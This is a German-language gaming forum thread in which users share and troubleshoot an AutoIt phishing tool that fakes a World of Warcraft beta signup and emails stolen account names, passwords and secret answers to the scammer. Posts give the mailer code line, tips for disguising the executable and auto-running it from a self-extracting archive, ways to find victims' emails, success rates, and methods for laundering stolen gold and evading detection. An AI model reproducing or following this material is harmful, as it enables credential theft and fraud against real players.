Register for your free account! | Forgot your password?

Go Back   elitepvpers > Popular Games > World of Warcraft > WoW Exploits, Hacks, Tools & Macros
You last visited: Today at 23:39

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



Accountscam mit Autoit Script und Fakemail.

Discussion on Accountscam mit Autoit Script und Fakemail. within the WoW Exploits, Hacks, Tools & Macros forum part of the World of Warcraft category.

Closed Thread
 
Old 02/09/2008, 14:51   #16
 
elite*gold: 0
Join Date: Dec 2007
Posts: 77
Received Thanks: 48
Quote:
Originally Posted by run32.dll View Post
Hallo Sordi

sag mal kommt der Name zufällig aus dem klassischem Adventure "Simon the Sorccerer"!? - dort heißt der böse Zauberer "Sordit" ^^

Habe ein kleines Problem mit dem script...
Ich habe mir 2 emailadressen angelegt zum testen, einmal bei "yahoo.de" und einmal "mail.com".

Dann habe ich den Code angepasst bei ...
Code:
 = _INetSmtpMailCom("smtp.mail.yahoo.de", , "<E-Mail hier>", "<E-Mail hier>", "WoWAccount", , "", "", "", "<Benutzername für E-Mail Account>", "<Password für E-Mail>", 25, 0)
zu:
Code:
 = _INetSmtpMailCom("smtp.mail.yahoo.de", , "", "", "WoWAccount", , "", "", "", "meinusername", "meinpw", 25, 0)
Dann habe ich das ganze compiliert (ohne Fehler), ausgeführt, testaccname+testpw eingegeben, geheimfrage eingegeben, dann erhalte ich diese Fehlermeldung:



Ich vermute mal das mit dem Mail versenden was nicht klappt oder?!
Habe die Mailadressen mit "<...>" und ohne probiert.
Welche der Adressen ist den der Absender und welche der Empfänger? Die erste im Code der Empfänger?
Ja das würde mich auch interessieren!
Aziris is offline  
Old 02/09/2008, 16:18   #17
 
elite*gold: 0
Join Date: Apr 2005
Posts: 745
Received Thanks: 669
Quote:
Func _INetSmtpMailCom( s_SmtpServer, s_FromName, s_FromAddress, s_ToAddress, s_Subject = "", as_Body = "", s_AttachFiles = "", s_CcAddress = "", s_BccAddress = "", s_Username = "", s_Password = "",IPPort=25, ssl=0)
Das is die Funktion folglich is das erste der server dann AbsenderName dann Absender Adresse dann Empfänger Adresse.

Wenn 2 mal selbe mail drin schicks also von sich an sich selbst. Dann braucht man nur einen Mailaccount. Und denk an die Thanks wenn ihrs benutzt.
Sordi is offline  
Thanks
2 Users
Old 02/09/2008, 16:21   #18
 
elite*gold: 0
Join Date: Dec 2007
Posts: 77
Received Thanks: 48
Quote:
Originally Posted by Sordi View Post
Hab mich entschieden, nachdem ich nun einen schicken 70er Mage auf nem neuen Account hab mein Tool zu releasen, welches ich selbst geschrieben hab.

Es ist ein AutoIt script mit eingebautem Mailer.
Es zeig eine Loginähnliches Fenster um Account und Password einzugeben.

Danach werden Abfragen für Geheimfrage gezeigt.
Anschließend wird alles Per Mail ohne zusatzprogramme zu euch geschickt.

Den Hintergrund hab ich mal von ner anderen Scamseite geklaut weil er mir ein bissel besser gefallen hat als mein eigener. (Aber der war auch net schlecht)

Komplett soll das Script die anmeldung für WotLK Beta vorgaukeln.
Eine passende E-Mail solltet ihr natürlich auch verschicken.

Hier ein Screen:



Zum Fakemail mit Anhang verschicken benutz ich SendMail zu finden hier:



E-Mail müsst ihr noch anpassen.

Und hier die AutoIt-Datei inkl. Background Bild-Datei (Muss im selben Ordner sein.)


Und ne kleine Vorlage für die E-Mail:



An den Accountnamen und die Geheimfrage kommt man über Passwort vergessen auf der WoW-Seite.
Such am besten nach Gilden-Foren mit Memberliste die haben SEHR oft die selbe e-mail dort wie bei WoW-Account verwenden und Sehr oft is der Accountname entweder ähnlich wie die E-Mail oder wie der Charactername.

Und nun Viel Spass beim Scammen.
Evt gebt ihr mir ja nen Account ab, als Belehonung. ^^
ACHTUNG: ICH SEHE HIER HABEN MEHRERE LEUTE PROBLEME MIT EINEM ERROR: ICH HABE IHN ANGESCHRIEBEN UND IHN GEFRAGT FOLGENDE SACHE: IHR MÜSST DIE "<" ">" WEGLASSEN!!!! ALSO ZB:
Code:
 = _INetSmtpMailCom("smtp.mail.yahoo.de", , "", "", "WoWAccount", , "", "", "", "wowscamwotl", "elitepvpers.com", 25, 0)
Aziris is offline  
Old 02/09/2008, 17:21   #19
 
Noyze's Avatar
 
elite*gold: 0
Join Date: Jun 2007
Posts: 2,935
Received Thanks: 1,862
Hm Sordi? hättest du vielleicht Zeit und Lust mir das Privat zu erklären wie das genau geht? weil ich bin da nicht so ein erfahrener drinne eher so en noob >_<"
Aber wäre super wenn du mir ein paar Hilfestellungen geben könntest per icq oder so
Kannst du mir deine Icq nummer schicken per pm? brauche echt Hilfe sonst spring ich gleich aussem Fenster
Noyze is offline  
Old 02/09/2008, 17:26   #20
 
bizzebizze's Avatar
 
elite*gold: 0
Join Date: Sep 2007
Posts: 39
Received Thanks: 5
Can anyone get this working? I can't Can someone with pro english help me on MSN? add:
Thanks
bizzebizze is offline  
Old 02/09/2008, 18:13   #21
 
run32.dll's Avatar
 
elite*gold: 0
Join Date: Jan 2007
Posts: 126
Received Thanks: 83
Habs zum Laufen gebracht.

Ich weiß allerdings nicht woran es lag. Ich habe meinen Rechner neugestartet, das script noch mal neu entpackt und neu editiert. Seit dem gehts *.°

Habe noch eine Idee wie man das *etwas* realistischer machen kann:
Wenn der User seine Daten eigibt kann man die nach Blizzards Kriterien überprüfen und gegebenenfalls eine Fehlermeldung ausgeben.

Zum Beispiel: "Der eingegebene Accountname oder das Passwort ist ungültig."

Diese Bedingungen habe ich mal rausgesucht von der Blizz-seite:

Quote:
Accountname Beschränkungen:
* Darf nur alphanumerische Zeichen wie A-Z, 0-9 enthalten.
* Muss zwischen drei und sechzehn Zeichen lang sein.

Passwortbeschränkungen:
* Darf nur alphanumerische Zeichen und Satzzeichen wie A-Z, 0-9 oder !"#$% enthalten.
* Muss zwischen acht und sechzehn Zeichen lang sein.
* Muss mindestens ein numerisches und ein alphabetisches Zeichen enthalten.
* Darf nicht mit dem Accountnamen übereinstimmen.
kanns leider nicht selbst reinscripten da ich nicht wüsste wie ^^
run32.dll is offline  
Old 02/09/2008, 18:14   #22
 
elite*gold: 0
Join Date: Dec 2007
Posts: 77
Received Thanks: 48
Code:
 _INetSmtpMailCom("smtp.mail.yahoo.de", , "", "", "WoWAccount", , "", "", "", "wowscamwotl", "elitepvpers.com", 25, 0)
LEAVE AWAY THE "<" ">" !!!!!
Aziris is offline  
Thanks
1 User
Old 02/09/2008, 22:37   #23
 
run32.dll's Avatar
 
elite*gold: 0
Join Date: Jan 2007
Posts: 126
Received Thanks: 83
Habe jetzt 40-50 Mails versendet. Mal gucken ob ein Fisch anbeißt

habe noch ein paar Tipps:
1. Beim Compilieren des Scripts kann man im Startmenü unter AutoIT "Compile Script to .exe" verwenden und der EXE ein glaubwürdiges Icon geben.
2. Zum Erstellen des Selbstentpackenden Archivs würde im Winace empfehlen. Damit läßt sich das Icon der EXE bestimmen. Man sollte WinACE aber registrieren damit beim entpacken nicht unregistred version in der Titelleiste steht. Nebenbei läßt sich hier einstellen das "WotLKBeta.exe" nach dem Entpacken automatisch ausgeführt wird.

Was ist eigentlich wenn ich jemanden plündere und das ganze Zeug an meinen Main schicke? Kann ein GM das zurückverfolgen? Besteht Gefahr für meinen Mainaccount?
run32.dll is offline  
Thanks
1 User
Old 02/10/2008, 00:05   #24
 
elite*gold: 0
Join Date: Apr 2005
Posts: 745
Received Thanks: 669
Quote:
Originally Posted by run32.dll View Post
Was ist eigentlich wenn ich jemanden plündere und das ganze Zeug an meinen Main schicke? Kann ein GM das zurückverfolgen? Besteht Gefahr für meinen Mainaccount?
Also da würd ich böse aufpassen.
Kann schlecht ausgehn wenn mans net wirklich geschickt macht.... besser auf nen Extra Account und net auf deinen Main Account. Z.B an nen anderen gescammten.
Und net das ganze Gold zu dir sonder immer nen Teil an wahllose Leute schicken einfach so random. Dann wissen die net zu 100% das der Account dem Scammer gehört!
Sordi is offline  
Thanks
1 User
Old 02/10/2008, 01:17   #25
 
run32.dll's Avatar
 
elite*gold: 0
Join Date: Jan 2007
Posts: 126
Received Thanks: 83
Alter Schwede! 3 Accounts!! *whee*
run32.dll is offline  
Old 02/10/2008, 01:38   #26
 
elite*gold: 0
Join Date: Apr 2005
Posts: 745
Received Thanks: 669
Kommt halt drauf an wie viele Mails du verschickst du an welche Leute xD


Hatte auch oft so ne Rate 1 Account per 20-30 Mails
Sordi is offline  
Thanks
1 User
Old 02/10/2008, 04:12   #27
 
elite*gold: 0
Join Date: Aug 2005
Posts: 323
Received Thanks: 69
Quote:
Originally Posted by run32.dll View Post
Habe jetzt 40-50 Mails versendet. Mal gucken ob ein Fisch anbeißt

habe noch ein paar Tipps:
1. Beim Compilieren des Scripts kann man im Startmenü unter AutoIT "Compile Script to .exe" verwenden und der EXE ein glaubwürdiges Icon geben.
2. Zum Erstellen des Selbstentpackenden Archivs würde im Winace empfehlen. Damit läßt sich das Icon der EXE bestimmen. Man sollte WinACE aber registrieren damit beim entpacken nicht unregistred version in der Titelleiste steht. Nebenbei läßt sich hier einstellen das "WotLKBeta.exe" nach dem Entpacken automatisch ausgeführt wird.

Was ist eigentlich wenn ich jemanden plündere und das ganze Zeug an meinen Main schicke? Kann ein GM das zurückverfolgen? Besteht Gefahr für meinen Mainaccount?
mach es nicht! wurde deswegen permbanned
gerüchten zufolge soll es etwas bringen, das zeug übers ah auf nen 2. acc zu verkaufen und dann nochma zu verkaufen. das zeug natürlich vorher in gold umwandeln und dann sinnlosgegenstände für immense summen kaufen/verkaufen. will dir aba keinen floh ins ohr gesetzt haben
ushon is offline  
Old 02/10/2008, 09:24   #28
 
TripleRR's Avatar
 
elite*gold: 0
Join Date: Oct 2006
Posts: 180
Received Thanks: 5
Hmmmm giebt es da ne straff rechtliche verfolgung oder sowas ? !
TripleRR is offline  
Old 02/10/2008, 17:16   #29
 
elite*gold: 0
Join Date: Apr 2005
Posts: 745
Received Thanks: 669
Quote:
Originally Posted by TripleRR View Post
Hmmmm giebt es da ne straff rechtliche verfolgung oder sowas ? !
Nich wirklich...erstens kannst du sogut wie garnet beweisen wer den Account gescammt hat. Zweitens wird kaum ein Gericht da nen Fall aufmachen wegen nen MMORPG Account wo das game mal 19 € gekost hat...
Sordi is offline  
Thanks
2 Users
Old 02/10/2008, 22:56   #30
 
elite*gold: 0
Join Date: Sep 2006
Posts: 2,704
Received Thanks: 249



wtf?

brauch ich da outlook express oder so ?
Reckoning is offline  
Closed Thread


Similar Threads Similar Threads
Accountscam mit Autoit Script und Fakemail...
03/31/2008 - WoW Exploits, Hacks, Tools & Macros - 4 Replies
Kann mir vllt. mal wer so ne e-mail schicken will wissen wie das so aussieht pls an : [email protected]



All times are GMT +2. The time now is 23:39.


Powered by vBulletin®
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2024 elitepvpers All Rights Reserved.